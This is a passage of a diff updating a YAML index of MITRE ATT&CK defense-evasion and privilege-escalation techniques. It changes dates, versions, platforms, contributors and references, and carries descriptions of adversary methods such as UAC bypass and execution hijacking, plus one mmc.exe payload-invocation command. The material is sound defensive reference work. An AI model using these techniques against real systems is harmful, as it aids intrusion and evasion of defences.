     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13763,6 +14048,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13838,11 +14123,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13891,13 +14177,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -13991,7 +14274,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14013,11 +14296,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14084,8 +14366,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14103,7 +14385,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14206,12 +14487,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14224,6 +14504,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14260,17 +14541,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14316,9 +14597,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14356,7 +14634,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14375,7 +14653,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14406,7 +14683,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14430,12 +14707,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14519,7 +14794,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14541,7 +14815,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14575,12 +14849,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14632,9 +14904,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14703,7 +14974,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14750,7 +15020,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14763,12 +15033,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14847,7 +15118,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14869,7 +15140,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -14912,7 +15182,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14936,8 +15206,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -14985,7 +15253,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15023,8 +15291,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15073,7 +15339,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15125,29 +15391,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15194,7 +15459,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15226,8 +15491,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15241,6 +15506,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15253,11 +15522,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15323,7 +15595,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15412,7 +15683,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15500,7 +15770,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15585,7 +15854,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15617,7 +15885,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15640,11 +15908,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15702,14 +15969,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15810,7 +16076,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15841,7 +16106,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15875,13 +16140,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -15900,7 +16163,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -15914,7 +16176,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -15941,8 +16202,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -15973,12 +16234,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16050,9 +16312,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
